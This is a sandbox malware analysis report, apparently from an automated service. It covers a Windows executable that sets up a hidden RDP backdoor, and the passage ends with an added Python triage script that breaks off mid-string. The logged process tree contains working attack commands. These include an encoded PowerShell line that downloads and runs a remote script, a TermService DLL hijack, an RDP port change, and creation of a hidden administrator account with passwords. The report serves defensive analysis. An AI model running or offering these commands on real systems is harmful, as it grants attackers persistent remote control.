Analysis
max time kernel: 131s
max time network: 124s
platform: windows7_x64
resource: win7v20201028
submitted: 09-11-2020 21:35
Static task: static1
Behavioral task: behavioral1
  Sample: eee9090fedb6cf32b1729db9cafb6b7995f45d7e417029e124b7960f06d194f2.exe
  Resource: win7v20201028
Behavioral task: behavioral2
  Sample: eee9090fedb6cf32b1729db9cafb6b7995f45d7e417029e124b7960f06d194f2.exe
  Resource: win10v20201028
General
Target: eee9090fedb6cf32b1729db9cafb6b7995f45d7e417029e124b7960f06d194f2.exe
Size: 3.5MB
MD5: 551466c49c45b71ee7b4d5a4fc0a800e
SHA1: be312273c1db869c5f23cc9ba24b31b66824a809
SHA256: eee9090fedb6cf32b1729db9cafb6b7995f45d7e417029e124b7960f06d194f2
SHA512: 1f4de516895870a74444b560df538259137900d73b78970926d7bebd0e759976630273e21c8cd6921aec85d614d6d305071cccf5c217762665e5e91d24694e4a
Malware Config
Extracted
https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1
Signatures

Grants admin privileges (1 TTPs)
Uses net.exe to modify the user's privileges.

Blacklisted process makes network request (10 IoCs)
flow  pid   process
7     1332  powershell.exe
9     1332  powershell.exe
11    1332  powershell.exe
12    1332  powershell.exe
14    1332  powershell.exe
16    1332  powershell.exe
18    1332  powershell.exe
20    1332  powershell.exe
22    1332  powershell.exe
24    1332  powershell.exe

Modifies RDP port number used by Windows (1 TTPs)

Possible privilege escalation attempt (8 IoCs)
pid   process
1640  icacls.exe
1740  icacls.exe
1360  icacls.exe
1104  icacls.exe
1664  takeown.exe
1668  icacls.exe
1844  icacls.exe
348   icacls.exe

Sets DLL path for service in the registry (2 TTPs)

Untitled signature (yara_rule table)
resource                        yara_rule
\Windows\Branding\mediasrv.png  upx
\Windows\Branding\mediasvc.png  upx

Deletes itself (1 IoCs)
pid   process
1300  powershell.exe

Loads dropped DLL (2 IoCs)
pid   process
920   (process name not shown)
920   (process name not shown)

Modifies file permissions (1 TTPs, 8 IoCs)
pid   process
1664  takeown.exe
1668  icacls.exe
1844  icacls.exe
348   icacls.exe
1640  icacls.exe
1740  icacls.exe
1360  icacls.exe
1104  icacls.exe

Drops file in System32 directory (1 IoCs)
description   ioc                             process
File created  C:\Windows\system32\rfxvmt.dll  powershell.exe

Modifies service (2 TTPs, 2 IoCs)
description      ioc                                                                                                                    process
Key created      \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\TermService\parameters                                                 reg.exe
Set value (str)  \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\TermService\Parameters\ServiceDLL = "C:\\Windows\\branding\\mediasrv.png"  reg.exe

Drops file in Windows directory (41 IoCs; process is powershell.exe for every entry)
description                   ioc
File created                  C:\Windows\branding\wupsvc.jpg
File opened for modification  C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
File opened for modification  C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_b89a67b9-a1d2-441b-b091-fc4c72c733cc
File created                  C:\Windows\branding\mediasrv.png
File opened for modification  C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\Cab61B.tmp
File opened for modification  C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\Tar8B1.tmp
File opened for modification  C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\Tar8E4.tmp
File opened for modification  C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\Cab914.tmp
File created                  C:\Windows\ServiceProfiles\NetworkService\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\4YVGEUJ8F4FQOB8SOHVY.temp
File opened for modification  C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\Cab55E.tmp
File opened for modification  C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\Cab65B.tmp
File opened for modification  C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\Tar8D2.tmp
File opened for modification  C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_853bbd5d-b68d-48ef-87bf-8de50817dd1c
File opened for modification  C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_9467568f-be88-49e8-aee1-12ed054c05a8
File opened for modification  C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_557f2bdc-7223-4bc4-a675-daed9c459a4f
File opened for modification  C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\Cab8E3.tmp
File opened for modification  C:\Windows\branding\Basebrd
File opened for modification  C:\Windows\branding\ShellBrd
File opened for modification  C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_e34d7a9e-8a76-4279-babe-2755e71e254f
File opened for modification  C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_1a795cec-8d5f-4d97-9380-b62861a1a288
File opened for modification  C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_b579aa51-24b8-4f1d-98f0-e5f386d98731
File opened for modification  C:\Windows\ServiceProfiles\NetworkService\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
File opened for modification  C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\Tar915.tmp
File created                  C:\Windows\branding\mediasvc.png
File opened for modification  C:\Windows\ServiceProfiles\NetworkService\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
File opened for modification  C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\Tar55F.tmp
File opened for modification  C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\Tar61C.tmp
File opened for modification  C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\Cab8B0.tmp
File opened for modification  C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_a4a4941d-999c-4ac6-ab08-c3f7b0939742
File opened for modification  C:\Windows\branding\wupsvc.jpg
File opened for modification  C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_fdc397f2-6440-4171-adaf-145c73ae938b
File opened for modification  C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\Tar65C.tmp
File opened for modification  C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\Temporary Internet Files
File opened for modification  C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat
File opened for modification  C:\Windows\branding\mediasvc.png
File opened for modification  C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_63fcdb2a-f6a1-4086-8d5f-39df79ec2181
File opened for modification  C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_c3a95c74-743f-49cf-99c8-bdb70d2550ac
File opened for modification  C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\Cab89E.tmp
File opened for modification  C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\Tar89F.tmp
File opened for modification  C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\Cab8D1.tmp
File opened for modification  C:\Windows\branding\mediasrv.png

Modifies data under HKEY_USERS (60 IoCs)
description       ioc                                                                                                           process
Key created       \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs                        powershell.exe
Key created       \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs                        powershell.exe
Key created       \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\                  WMIC.exe
Key created       \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\My                                             powershell.exe
Key created       \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed                                     powershell.exe
Key created       \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root\CRLs                                      powershell.exe
Key created       \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot                                  powershell.exe
Key created       \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates            powershell.exe
Key created       \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust\CTLs                            powershell.exe
Key created       \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings                           powershell.exe
Key created       \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA\CTLs                                        powershell.exe
Key created       \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA\Certificates                       powershell.exe
Key created       \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA\CRLs                               powershell.exe
Key created       \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad                      powershell.exe
Key created       \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs                    powershell.exe
Key created       \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust                                          powershell.exe
Set value (int)   \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"  powershell.exe
Key created       \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings                           powershell.exe
Key created       \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root                                           powershell.exe
Key created       \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates                     powershell.exe
Key created       \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople                         powershell.exe
Key created       \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA                                    powershell.exe
Key created       \REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\MuiCache                                             powershell.exe
Key created       \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\                  WMIC.exe
Set value (data)  \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 80dc8a7e05b8d601  powershell.exe
Key created       \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust\CRLs                            powershell.exe
Key created       \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed                            powershell.exe
Key created       \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust                                 powershell.exe
Key created       \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust\Certificates                    powershell.exe
Key created       \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed\CTLs                                powershell.exe
Key created       \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs                             powershell.exe
Set value (int)   \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable = "0"         powershell.exe
Key created       \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople                                  powershell.exe
Key created       \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections               powershell.exe
Key created       \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA\Certificates                                powershell.exe
Key created       \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs                             powershell.exe
Set value (data)  \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings = 4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000  powershell.exe
Key created       \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs                    powershell.exe
Key created       \REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\MuiCache\25\52C64B7E                                 powershell.exe
Key created       \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage                          powershell.exe
Key created       \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed\Certificates                        powershell.exe
Key created       \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root\Certificates                              powershell.exe
Key created       \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA                                             powershell.exe
Key created       \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root\CTLs                                      powershell.exe
Key created       \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs                             powershell.exe
Set value (int)   \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"  powershell.exe
Set value (int)   \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\EnableNegotiate = "1"     powershell.exe
Set value (int)   \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"  powershell.exe
Set value (data)  \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000  powershell.exe
Key created       \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates                     powershell.exe
Key created       \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs                             powershell.exe
Key created       \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust\CTLs                                     powershell.exe
Key created       \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA\CTLs                               powershell.exe
Key created       \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust\CRLs                                     powershell.exe
Set value (int)   \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"  powershell.exe
Key created       \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA\CRLs                                        powershell.exe
Key created       \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed\CRLs                                powershell.exe
Key created       \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust\Certificates                             powershell.exe
Key created       \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates               powershell.exe
Key created       \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\                  powershell.exe

Modifies registry key (1 TTPs, 1 IoCs)

Runs net.exe

Script User-Agent (4 IoCs)
Uses user-agent string associated with script host/environment.
description             flow  ioc
HTTP User-Agent header  11    Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header  12    Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header  14    Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header  16    Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: EnumeratesProcesses (7 IoCs)
pid   process
1300  powershell.exe
1300  powershell.exe
1300  powershell.exe
1300  powershell.exe
1300  powershell.exe
1332  powershell.exe
1332  powershell.exe

Suspicious behavior: LoadsDriver (5 IoCs; process names not shown)
pid
472
920
920
920
920

Suspicious use of AdjustPrivilegeToken (15 IoCs)
description                           pid   process
Token: SeDebugPrivilege               1300  powershell.exe
Token: SeRestorePrivilege             1844  icacls.exe
Token: SeAssignPrimaryTokenPrivilege  1152  WMIC.exe
Token: SeIncreaseQuotaPrivilege       1152  WMIC.exe
Token: SeAuditPrivilege               1152  WMIC.exe
Token: SeAssignPrimaryTokenPrivilege  1152  WMIC.exe
Token: SeIncreaseQuotaPrivilege       1152  WMIC.exe
Token: SeAuditPrivilege               1152  WMIC.exe
Token: SeAssignPrimaryTokenPrivilege  1512  WMIC.exe
Token: SeIncreaseQuotaPrivilege       1512  WMIC.exe
Token: SeAuditPrivilege               1512  WMIC.exe
Token: SeAssignPrimaryTokenPrivilege  1512  WMIC.exe
Token: SeIncreaseQuotaPrivilege       1512  WMIC.exe
Token: SeAuditPrivilege               1512  WMIC.exe
Token: SeDebugPrivilege               1332  powershell.exe

Suspicious use of WriteProcessMemory (133 IoCs; the 64 entries shown on the page, with repeated source/target pairs collapsed into a count)
source pid  source process                                                            target pid  target process  count
684         eee9090fedb6cf32b1729db9cafb6b7995f45d7e417029e124b7960f06d194f2.exe     1300        powershell.exe  4
1300        powershell.exe                                                            676         csc.exe         3
676         csc.exe                                                                   860         cvtres.exe      3
1300        powershell.exe                                                            1664        takeown.exe     3
1300        powershell.exe                                                            1668        icacls.exe      3
1300        powershell.exe                                                            1844        icacls.exe      3
1300        powershell.exe                                                            348         icacls.exe      3
1300        powershell.exe                                                            1640        icacls.exe      3
1300        powershell.exe                                                            1740        icacls.exe      3
1300        powershell.exe                                                            1360        icacls.exe      3
1300        powershell.exe                                                            1104        icacls.exe      3
1300        powershell.exe                                                            684         reg.exe         3
1300        powershell.exe                                                            848         reg.exe         3
1300        powershell.exe                                                            568         reg.exe         3
1300        powershell.exe                                                            368         net.exe         3
368         net.exe                                                                   1620        net1.exe        3
1300        powershell.exe                                                            1908        cmd.exe         3
1908        cmd.exe                                                                   2036        cmd.exe         3
2036        cmd.exe                                                                   2016        net.exe         3
2016        net.exe                                                                   1504        net1.exe        3
1300        powershell.exe                                                            1072        cmd.exe         3
Processes
Each process is indented by its depth in the tree; [n] is the depth the report assigns, the line beneath the image path is the command line as logged, and the bullets are the signatures that fired on that process.

[1] C:\Users\Admin\AppData\Local\Temp\eee9090fedb6cf32b1729db9cafb6b7995f45d7e417029e124b7960f06d194f2.exe
    "C:\Users\Admin\AppData\Local\Temp\eee9090fedb6cf32b1729db9cafb6b7995f45d7e417029e124b7960f06d194f2.exe"
    - Suspicious use of WriteProcessMemory
    [2] \??\c:\windows\system32\WindowsPowerShell\v1.0\powershell.exe
        -ep bypass -f C:\Users\Admin\AppData\Local\Temp\get-points.ps1
        - Deletes itself
        - Drops file in System32 directory
        - Drops file in Windows directory
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
        - Suspicious use of WriteProcessMemory
        [3] C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
            "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\niy0jjqs\niy0jjqs.cmdline"
            - Suspicious use of WriteProcessMemory
            [4] C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7149.tmp" "c:\Users\Admin\AppData\Local\Temp\niy0jjqs\CSC2F104AD658C14F50B898825C301F8E4D.TMP"
        [3] C:\Windows\system32\takeown.exe
            "C:\Windows\system32\takeown.exe" /A /F rfxvmt.dll
            - Possible privilege escalation attempt
            - Modifies file permissions
        [3] C:\Windows\system32\icacls.exe
            "C:\Windows\system32\icacls.exe" rfxvmt.dll /inheritance:d
            - Possible privilege escalation attempt
            - Modifies file permissions
        [3] C:\Windows\system32\icacls.exe
            "C:\Windows\system32\icacls.exe" rfxvmt.dll /setowner "NT SERVICE\TrustedInstaller"
            - Possible privilege escalation attempt
            - Modifies file permissions
            - Suspicious use of AdjustPrivilegeToken
        [3] C:\Windows\system32\icacls.exe
            "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT SERVICE\TrustedInstaller:F"
            - Possible privilege escalation attempt
            - Modifies file permissions
        [3] C:\Windows\system32\icacls.exe
            "C:\Windows\system32\icacls.exe" rfxvmt.dll /remove "NT AUTHORITY\SYSTEM"
            - Possible privilege escalation attempt
            - Modifies file permissions
        [3] C:\Windows\system32\icacls.exe
            "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT AUTHORITY\SYSTEM:RX"
            - Possible privilege escalation attempt
            - Modifies file permissions
        [3] C:\Windows\system32\icacls.exe
            "C:\Windows\system32\icacls.exe" rfxvmt.dll /remove BUILTIN\Administrators
            - Possible privilege escalation attempt
            - Modifies file permissions
        [3] C:\Windows\system32\icacls.exe
            "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant BUILTIN\Administrators:RX
            - Possible privilege escalation attempt
            - Modifies file permissions
        [3] C:\Windows\system32\reg.exe
            "C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f
        [3] C:\Windows\system32\reg.exe
            "C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f
            - Modifies service
            - Modifies registry key
        [3] C:\Windows\system32\reg.exe
            "C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f
        [3] C:\Windows\system32\net.exe
            "C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
            - Suspicious use of WriteProcessMemory
            [4] C:\Windows\system32\net1.exe
                C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
        [3] C:\Windows\system32\cmd.exe
            "C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr
            - Suspicious use of WriteProcessMemory
            [4] C:\Windows\system32\cmd.exe
                cmd /c net start rdpdr
                - Suspicious use of WriteProcessMemory
                [5] C:\Windows\system32\net.exe
                    net start rdpdr
                    - Suspicious use of WriteProcessMemory
                    [6] C:\Windows\system32\net1.exe
                        C:\Windows\system32\net1 start rdpdr
        [3] C:\Windows\system32\cmd.exe
            "C:\Windows\system32\cmd.exe" /c cmd /c net start TermService
            [4] C:\Windows\system32\cmd.exe
                cmd /c net start TermService
                [5] C:\Windows\system32\net.exe
                    net start TermService
                    [6] C:\Windows\system32\net1.exe
                        C:\Windows\system32\net1 start TermService
        [3] C:\Windows\system32\cmd.exe
            "C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f
        [3] C:\Windows\system32\cmd.exe
            "C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f

[1] C:\Windows\System32\cmd.exe
    cmd /C net.exe user wgautilacc Ghar4f5 /del
    [2] C:\Windows\system32\net.exe
        net.exe user wgautilacc Ghar4f5 /del
        [3] C:\Windows\system32\net1.exe
            C:\Windows\system32\net1 user wgautilacc Ghar4f5 /del

[1] C:\Windows\System32\cmd.exe
    cmd /C net.exe user wgautilacc wHLGRkc2 /add
    [2] C:\Windows\system32\net.exe
        net.exe user wgautilacc wHLGRkc2 /add
        [3] C:\Windows\system32\net1.exe
            C:\Windows\system32\net1 user wgautilacc wHLGRkc2 /add

[1] C:\Windows\System32\cmd.exe
    cmd /C net.exe LOCALGROUP "Remote Desktop Users" wgautilacc /ADD
    [2] C:\Windows\system32\net.exe
        net.exe LOCALGROUP "Remote Desktop Users" wgautilacc /ADD
        [3] C:\Windows\system32\net1.exe
            C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" wgautilacc /ADD

[1] C:\Windows\System32\cmd.exe
    cmd /C net.exe LOCALGROUP "Remote Desktop Users" TUICJFPF$ /ADD
    [2] C:\Windows\system32\net.exe
        net.exe LOCALGROUP "Remote Desktop Users" TUICJFPF$ /ADD
        [3] C:\Windows\system32\net1.exe
            C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" TUICJFPF$ /ADD

[1] C:\Windows\System32\cmd.exe
    cmd /C net.exe LOCALGROUP "Administrators" wgautilacc /ADD
    [2] C:\Windows\system32\net.exe
        net.exe LOCALGROUP "Administrators" wgautilacc /ADD
        [3] C:\Windows\system32\net1.exe
            C:\Windows\system32\net1 LOCALGROUP "Administrators" wgautilacc /ADD

[1] C:\Windows\System32\cmd.exe
    cmd /C net.exe user wgautilacc wHLGRkc2
    [2] C:\Windows\system32\net.exe
        net.exe user wgautilacc wHLGRkc2
        [3] C:\Windows\system32\net1.exe
            C:\Windows\system32\net1 user wgautilacc wHLGRkc2

[1] C:\Windows\System32\cmd.exe
    cmd.exe /C wmic path win32_VideoController get name
    [2] C:\Windows\System32\Wbem\WMIC.exe
        wmic path win32_VideoController get name
        - Modifies data under HKEY_USERS
        - Suspicious use of AdjustPrivilegeToken

[1] C:\Windows\System32\cmd.exe
    cmd.exe /C wmic CPU get NAME
    [2] C:\Windows\System32\Wbem\WMIC.exe
        wmic CPU get NAME
        - Modifies data under HKEY_USERS
        - Suspicious use of AdjustPrivilegeToken

[1] C:\Windows\System32\cmd.exe
    cmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
    [2] C:\Windows\system32\cmd.exe
        cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
        [3] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
            - Blacklisted process makes network request
            - Drops file in Windows directory
            - Modifies data under HKEY_USERS
            - Suspicious behavior: EnumeratesProcesses
            - Suspicious use of AdjustPrivilegeToken

[1] C:\Windows\System32\cmd.exe
    cmd.exe /C net user wgautilacc 1234
    [2] C:\Windows\system32\net.exe
        net user wgautilacc 1234
        [3] C:\Windows\system32\net1.exe
            C:\Windows\system32\net1 user wgautilacc 1234
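Read together, the command lines above assemble remote-desktop access that does not depend on the original executable staying on disk: powershell.exe (PID 1300) drops rfxvmt.dll into System32 and resets its owner and ACL to the TrustedInstaller-owned layout of an OS-installed file, points the TermService ServiceDLL at C:\Windows\branding\mediasrv.png (UPX-packed per the yara_rule table), moves the RDP listener to 0x1C21 (TCP 7201), sets the fEnableWddmDriver policy to 0, adds NT AUTHORITY\NETWORK SERVICE (the account TermService runs as) to Administrators, starts rdpdr and TermService, and deletes the .ps1 and .txt files from %temp%. A second set of process trees then creates the local user wgautilacc, adds it to Remote Desktop Users and Administrators, and resets its password twice. The script below is an added example and is not part of the report, the sandbox or the sample: it decodes the -enc payload of the last powershell.exe in the tree (the result is the URL listed under Malware Config) and runs a small set of command-line rules over command lines copied from the tree. The rule names, the regexes and the sample list are the example's own and are not taken from any product.

```python
"""Added triage helpers for this report (not the report's, the sandbox's or
the sample's code): decode the PowerShell -enc payload and flag the command
lines that set up the RDP backdoor."""
import base64
import re

# The -enc argument exactly as it appears in the process tree (split only for
# line length).
ENC_B64 = (
    "SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkA"
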